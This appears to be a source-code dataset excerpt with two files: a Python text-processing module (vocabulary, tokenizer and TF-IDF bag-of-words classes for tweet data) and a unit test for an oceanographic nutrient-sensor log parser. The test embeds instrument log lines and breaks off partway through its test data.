| 32.971963 | 112 | 0.628685 | 3,352 | 0.950113 | 0 | 0 | 0 | 0 | 0 | 0 | 886 | 0.251134 |
5e207031666baef9fa1beb161fc9d7be24e369d1 | 15,851 | py | Python | text_models/vocabulary.py | INGEOTEC/text_models | f5a44585d21828e4309b2435d6f91f822a5debb5 | [
"Apache-2.0"
] | 12 | 2020-05-04T18:01:48.000Z | 2022-03-23T22:38:31.000Z | text_models/vocabulary.py | INGEOTEC/text_models | f5a44585d21828e4309b2435d6f91f822a5debb5 | [
"Apache-2.0"
] | 18 | 2020-07-14T15:08:59.000Z | 2022-03-17T09:28:19.000Z | text_models/vocabulary.py | INGEOTEC/text_models | f5a44585d21828e4309b2435d6f91f822a5debb5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Mario Graff Guerrero
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
from microtc.utils import load_model, Counter
from b4msa.textmodel import TextModel
from microtc.weighting import TFIDF
from microtc.utils import SparseMatrix
from scipy.sparse import csr_matrix
from typing import List, Iterable, OrderedDict, Union, Dict, Any, Tuple
from .utils import download_tokens, handle_day
# Default keyword arguments for b4msa's TextModel text transformations;
# presumably user mentions and URLs are deleted while numbers and emojis
# pass through unchanged -- confirm against the b4msa TextModel docs.
TM_ARGS=dict(usr_option="delete", num_option="none",
             url_option="delete", emo_option="none",
             del_dup=False, del_punc=True)
class Vocabulary(object):
    """
    Vocabulary class is used to transform the tokens and their
    respective frequencies in a Text Model, as well as, to analyze
    the tokens obtained from tweets collected.

    This class can be used to replicate some of the Text Models
    developed for :py:class:`EvoMSA.base.EvoMSA`.

    :param data: Tokens and their frequencies, or the day(s) to download
    :type data: str or list
    :param lang: Language (Ar, En, or Es)
    :type lang: str
    :param country: Two letter country code
    :type country: str
    :param states: Whether to keep the state or accumulate the information on the country
    :type states: bool

    >>> from text_models.vocabulary import Vocabulary
    >>> day = dict(year=2020, month=2, day=14)
    >>> voc = Vocabulary(day, lang="En", country="US")
    """

    def __init__(self, data, lang: str="Es",
                 country: str=None, states: bool=False) -> None:
        self._lang = lang
        self._country = country
        self._states = states
        # A plain dict with more than three entries is already a
        # token -> frequency mapping; anything else (a day dict, a date,
        # or a list of days) identifies data sets to download.
        if isinstance(data, dict) and len(data) > 3:
            self._data = data
        else:
            self.date = data
            self._init(data)
        if not states:
            # Totals used by :py:meth:`probability`; bigram keys contain "~".
            self._n_words = sum([v for k, v in self.voc.items() if k.count("~") == 0])
            self._n_bigrams = sum([v for k, v in self.voc.items() if k.count("~")])

    def probability(self):
        """Transform frequency to a probability (in place).

        Words are normalized by the word total and bigrams by the
        bigram total computed in :py:meth:`__init__`.
        """
        voc = self.voc
        for k in voc:
            num = voc[k]
            if k.count("~"):
                den = self._n_bigrams
            else:
                den = self._n_words
            voc[k] = num / den

    def _init(self, data):
        """
        Process the :py:attr:`data` to create a :py:class:`microtc.utils.Counter`

        :param data: a single day or a list of days to download
        """
        def sum_vocs(vocs):
            # Fold a list of counters into one by repeated addition.
            voc = vocs[0]
            for v in vocs[1:]:
                voc = voc + v
            return voc
        if isinstance(data, list):
            vocs = [download_tokens(day, lang=self._lang, country=self._country)
                    for day in data]
            vocs = [load_model(x) for x in vocs]
            if isinstance(vocs[0], Counter):
                voc = sum_vocs(vocs)
            elif not self._states:
                # Per-state counters: collapse each day's states first,
                # then accumulate across days.
                vocs = [sum_vocs([v for _, v in i]) for i in vocs]
                voc = sum_vocs(vocs)
            else:
                # Keep the per-state breakdown, merging days state by state.
                voc = {k: v for k, v in vocs[0]}
                for v in vocs[1:]:
                    for k, d in v:
                        try:
                            voc[k] = voc[k] + d
                        except KeyError:
                            voc[k] = d
            self._data = voc
        else:
            self.voc = load_model(download_tokens(data, lang=self._lang, country=self._country))

    @property
    def date(self):
        """
        Date obtained from the filename, on multiple files, this is not available.
        """
        return self._date

    @date.setter
    def date(self, d):
        # Multiple days have no single date.
        if isinstance(d, list):
            self._date = None
            return
        self._date = handle_day(d)

    @property
    def weekday(self):
        """
        Weekday as a string digit (Monday is "0").
        """
        return str(self.date.weekday())

    @property
    def voc(self):
        """Vocabulary, i.e., tokens and their frequencies"""
        return self._data

    @voc.setter
    def voc(self, d):
        if not isinstance(d, list):
            self._data = d
            return
        if self._states:
            # Keep (state, counter) pairs as a mapping.
            self._data = {k: v for k, v in d}
            return
        # Accumulate the per-state counters into a single one.
        aggr = d[0][1]
        for _, v in d[1:]:
            aggr = aggr + v
        self._data = aggr

    def common_words(self, quantile: float=None, bigrams=True):
        """Words used frequently; these correspond to py:attr:`EvoMSA.base.EvoMSA(B4MSA=True)`

        In the case quantile is given then the words and bigrams correspond
        to the most frequent ones whose cumulative probability covers it.
        """
        if quantile is None:
            from EvoMSA.utils import download
            return load_model(download("b4msa_%s.tm" % self._lang)).model.word2id
        words_N = sum([v for k, v in self.voc.items() if k.count("~") == 0])
        score = [[k, v / words_N] for k, v in self.voc.items() if k.count("~") == 0]
        score.sort(key=lambda x: x[1], reverse=True)
        cum, k = 0, 0
        while cum <= quantile:
            cum += score[k][1]
            k += 1
        output = [k for k, _ in score[:k]]
        if bigrams:
            bigrams_N = sum([v for k, v in self.voc.items() if k.count("~")])
            score_bi = [[k, v / bigrams_N] for k, v in self.voc.items() if k.count("~")]
            score_bi.sort(key=lambda x: x[1], reverse=True)
            cum, k = 0, 0
            while cum <= quantile:
                cum += score_bi[k][1]
                k += 1
            output += [k for k, _ in score_bi[:k]]
        return output

    @staticmethod
    def _co_occurrence(word: str, voc: dict) -> dict:
        """Map each token co-occurring with ``word`` in a bigram to its frequency."""
        D = dict()
        for k, v in voc.items():
            if k.count("~") == 0:
                continue
            a, b = k.split("~")
            if a != word and b != word:
                continue
            # Keep the other member of the bigram as the key.
            key = a if a != word else b
            D[key] = v
        return D

    def co_occurrence(self, word: str) -> dict:
        """Co-occurrence frequencies of ``word``, per state when applicable."""
        if self._states:
            return {k: self._co_occurrence(word, v) for k, v in self.voc.items()}
        return self._co_occurrence(word, self.voc)

    def day_words(self) -> "Vocabulary":
        """Words used on the same day of different years.

        Returns ``None`` when no other year has downloadable data.
        """
        from datetime import date, datetime
        hoy = date.today()
        # Bug fix: ``day`` used to be built from ``hoy.month``.
        hoy = datetime(year=hoy.year, month=hoy.month, day=hoy.day)
        L = []
        for year in range(2015, hoy.year + 1):
            try:
                curr = datetime(year=year, month=self.date.month, day=self.date.day)
            except ValueError:
                # e.g. Feb 29 on a non-leap year.
                continue
            if (curr - self.date).days == 0:
                # Skip this vocabulary's own day.
                continue
            try:
                download_tokens(curr, lang=self._lang, country=self._country)
            except Exception:
                continue
            L.append(curr)
        if len(L) == 0:
            return None
        return self.__class__(L if len(L) > 1 else L[0],
                              lang=self._lang,
                              country=self._country,
                              states=self._states)

    def __iter__(self):
        for x in self.voc:
            yield x

    def remove_emojis(self):
        """Remove emojis (but not hashtags) from the vocabulary."""
        from .dataset import Dataset
        data = Dataset()
        data.add(data.load_emojis())
        keys = [(k, [x for x in data.klass(k) if not x.isnumeric()]) for k in self]
        keys = [(k, v) for k, v in keys if len(v) and v[0] != "#"]
        for k, v in keys:
            del self.voc[k]

    def previous_day(self):
        """Vocabulary of the previous day."""
        import datetime
        one_day = datetime.timedelta(days=1)
        r = self.date - one_day
        _ = self.__class__(r, lang=self._lang,
                           country=self._country,
                           states=self._states)
        return _

    def __len__(self):
        return len(self.voc)

    def __getitem__(self, key):
        return self.voc[key]

    def __contains__(self, key):
        return key in self.voc

    def get(self, data, defaultvalue=0):
        """Frequency of data"""
        return self.voc.get(data, defaultvalue)

    def items(self):
        """Items of :py:attr:`self.voc`"""
        return self.voc.items()

    def remove(self, words: dict, bigrams=True) -> None:
        """
        Remove the words from the current vocabulary.

        :param words: Tokens
        :param bigrams: When True, also remove every bigram containing a token
        """
        if not bigrams:
            voc = self.voc
            for w in words:
                try:
                    del voc[w]
                except Exception:
                    continue
            return
        # Collect keys in a set: a bigram could otherwise be gathered twice
        # (once as a component match, once as a direct match) and the second
        # ``del`` would raise KeyError.
        keys = set()
        for k in self.voc:
            if k.count("~"):
                a, b = k.split("~")
                if a in words or b in words:
                    keys.add(k)
            if k in words:
                keys.add(k)
        for k in keys:
            del self.voc[k]

    def remove_qgrams(self):
        """Placeholder: this vocabulary stores no q-grams to remove."""
        pass

    def histogram(self, min_elements: int=30, words: bool=False):
        """Group tokens by frequency, merging consecutive frequency bins
        until each group holds at least ``min_elements`` tokens.

        :param words: When False, only bigrams (keys with "~") are grouped.
        """
        group = defaultdict(list)
        [group[v].append(k) for k, v in self.voc.items() if words or k.count("~")]
        keys = list(group.keys())
        keys.sort()
        lst = list()
        hist = OrderedDict()
        for k in keys:
            _ = group[k]
            if len(lst) + len(_) >= min_elements:
                hist[k] = lst + _
                lst = list()
                continue
            lst += _
        if len(lst):
            # Flush the remainder under the last frequency seen.
            hist[k] = lst
        return hist
class Tokenize(object):
    """ Tokenize transforms a text into a sequence, where
    each number identifies a particular token; the q-grams
    that are not found in the text are ignored.

    :param tm_args: keyword arguments for :py:class:`b4msa.textmodel.TextModel`;
        defaults to the module-level ``TM_ARGS``.

    >>> from text_models import Tokenize
    >>> tok = Tokenize().fit(["hi~mario", "mario"])
    >>> tok.transform("good morning mario")
    [1]
    """

    def __init__(self, tm_args: Dict[str, Any]=None):
        # Bug fix: the default used to be the module-level TM_ARGS dict
        # itself -- a shared mutable default argument; resolve it lazily
        # instead so callers cannot mutate the module default by accident.
        if tm_args is None:
            tm_args = TM_ARGS
        self._head = dict()         # root node of the token trie
        self._vocabulary = dict()   # token -> integer id
        self._tag = "__end__"       # trie key marking a complete token
        self._textmodel = TextModel(**tm_args)

    @property
    def vocabulary(self) -> Dict[str, int]:
        """Vocabulary used"""
        return self._vocabulary

    @property
    def textModel(self):
        """Text model, i.e., :py:class::`b4msa.text_model.TextModel`
        """
        return self._textmodel

    def fit(self, tokens: List[str]) -> 'Tokenize':
        """Train the tokenizer.

        Each new token is inserted character by character into a trie;
        its id is the insertion order, stored under the end-marker key.

        :param tokens: Vocabulary as a list of tokens
        :type tokens: List[str]
        """
        voc = self.vocabulary
        head = self._head
        tag = self._tag
        for word in tokens:
            if word in voc:
                continue
            current = head
            for char in word:
                try:
                    current = current[char]
                except KeyError:
                    _ = dict()
                    current[char] = _
                    current = _
            cnt = len(voc)
            voc[word] = cnt
            current[tag] = cnt
        return self

    def transform(self, texts: Union[Iterable[str], str]) -> List[Union[List[int], int]]:
        """Transform the input into a sequence where each element represents
        a token in the vocabulary (i.e., :py:attr:`text_models.vocabulary.Tokenize.vocabulary`)"""
        func = self.textModel.text_transformations
        trans = self._transform
        if isinstance(texts, str):
            return trans(func(texts))
        return [trans(func(x)) for x in texts]

    def _transform(self, text: str) -> List[int]:
        """Greedy longest-match scan of ``text`` against the trie.

        Unmatched characters are skipped one at a time.
        """
        L = []
        i = 0
        while i < len(text):
            wordid, pos = self.find(text, i=i)
            if wordid == -1:
                i += 1
                continue
            i = pos
            L.append(wordid)
        return L

    def find(self, text: str, i: int=0) -> Tuple[int, int]:
        """Longest token starting at position ``i``.

        :return: ``(token_id, end_position)``; ``token_id`` is -1 when no
            token in the vocabulary starts at ``i``.
        """
        end = i
        head = self._head
        current = head
        tag = self._tag
        wordid = -1
        while i < len(text):
            char = text[i]
            try:
                current = current[char]
                i += 1
                try:
                    # Remember the longest complete token seen so far.
                    wordid = current[tag]
                    end = i
                except KeyError:
                    pass
            except KeyError:
                break
        return wordid, end

    def id2word(self, id: int) -> str:
        """Token associated with id

        :param id: Identifier
        :type id: int
        """
        try:
            id2w = self._id2w
        except AttributeError:
            # Build (and cache) the reverse mapping on first use.
            id2w = {v: k for k, v in self.vocabulary.items()}
            self._id2w = id2w
        return id2w[id]
class BagOfWords(SparseMatrix):
    """Bag of word model using TFIDF and
    :py:class:`text_models.vocabulary.Tokenize`

    :param tokens: Language (Ar|En|Es) or list of tokens
    :type tokens: str|List
    """

    def __init__(self, tokens: Union[str, List[str]]="Es"):
        from microtc.utils import load_model
        from EvoMSA.utils import download

        if isinstance(tokens, list):
            words = tokens
        else:
            # A language code: pull the pre-trained b4msa vocabulary.
            words = list(load_model(download("b4msa_%s.tm" % tokens)).model.word2id.keys())

        def clean(token):
            # Drop empty components left by leading/trailing "~".
            return "~".join([x for x in token.split("~") if len(x)])

        tok = Tokenize()
        # Fit order fixes the token ids: bigrams, then words, then q-grams.
        tok.fit([clean(k) for k in words if k.count("~") and k[:2] != "q:"])
        tok.fit([clean(k) for k in words if k.count("~") == 0 and k[:2] != "q:"])
        qgrams = [clean(k[2:]) for k in words if k[:2] == "q:"]
        tok.fit([x for x in qgrams if x.count("~") == 0 if len(x) >= 2])
        self._tokenize = tok
        self._text = "text"

    @property
    def tokenize(self) -> Tokenize:
        """
        :py:class:`text_models.vocabulary.Tokenize` instance
        """
        return self._tokenize

    def get_text(self, data: Union[dict, str]) -> str:
        """Get text keywords from dict"""
        return data if isinstance(data, str) else data[self._text]

    def fit(self, X: List[Union[str, dict]]) -> 'BagOfWords':
        """ Train the Bag of words model"""
        from microtc.utils import Counter
        cnt = Counter()
        for seq in self.tokenize.transform([self.get_text(x) for x in X]):
            cnt.update(seq)
        self._tfidf = TFIDF.counter(cnt)
        return self

    @property
    def tfidf(self) -> TFIDF:
        return self._tfidf

    def id2word(self, id: int) -> str:
        """Token associated with id

        :param id: Identifier
        :type id: int
        """
        try:
            mapping = self._w_id2w
        except AttributeError:
            # Build and cache the reverse TFIDF mapping on first use.
            mapping = {v: k for k, v in self.tfidf.word2id.items()}
            self._w_id2w = mapping
        return self.tokenize.id2word(mapping[id])

    @property
    def num_terms(self):
        return len(self.tokenize.vocabulary)

    def _transform(self, data: List[str]) -> List[Tuple[int, float]]:
        """Transform a list of text to a Bag of Words using TFIDF"""
        tfidf = self.tfidf
        return [tfidf[seq] for seq in self.tokenize.transform(data)]

    def transform(self, data: List[str]) -> csr_matrix:
        """Transform a list of text to a Bag of Words using TFIDF"""
        return self.tonp(self._transform(data))
5e213db3d7c8731ee9cd5b190ac0d877c08a9943 | 23,700 | py | Python | mi/dataset/parser/test/test_nutnrb.py | rhan1498/marine-integrations | ad94c865e0e4cc7c8fd337870410c74b57d5c826 | [
"BSD-2-Clause"
] | null | null | null | mi/dataset/parser/test/test_nutnrb.py | rhan1498/marine-integrations | ad94c865e0e4cc7c8fd337870410c74b57d5c826 | [
"BSD-2-Clause"
] | null | null | null | mi/dataset/parser/test/test_nutnrb.py | rhan1498/marine-integrations | ad94c865e0e4cc7c8fd337870410c74b57d5c826 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_nutnrb
@file marine-integrations/mi/dataset/parser/test/test_nutnrb.py
@author Roger Unwin
@brief Test code for a Nutnrb data parser
"""
import unittest
import gevent
from StringIO import StringIO
from nose.plugins.attrib import attr
from mi.core.log import get_logger ; log = get_logger()
from mi.core.exceptions import SampleException
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_driver import DataSetDriverConfigKeys
from mi.dataset.parser.nutnrb import NutnrbParser, NutnrbDataParticle, StateKey
# Add a mixin here if needed
@unittest.skip('Nutnr parser is broken, timestamp needs to be fixed')
@attr('UNIT', group='mi')
class NutnrbParserUnitTestCase(ParserUnitTestCase):
"""
WFP Parser unit test suite
"""
TEST_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
LONG_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:31:14.041 SATNLC0239,2012348,15.519770,-5.28,18.39,-27.76,0.59,0.000212
2012/12/13 15:31:15.350 SATNLC0239,2012348,15.520128,-7.57,32.65,-51.28,0.62,0.000186
2012/12/13 15:31:16.695 SATNLC0239,2012348,15.520501,-6.17,24.43,-37.71,0.60,0.000218
2012/12/13 15:31:18.015 SATNLC0239,2012348,15.520875,-5.59,18.68,-28.01,0.60,0.000166
2012/12/13 15:31:19.342 SATNLC0239,2012348,15.521232,-7.30,30.87,-48.21,0.62,0.000235
2012/12/13 15:31:20.704 SATNLC0239,2012348,15.521605,-7.52,31.35,-49.03,0.63,0.000240
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
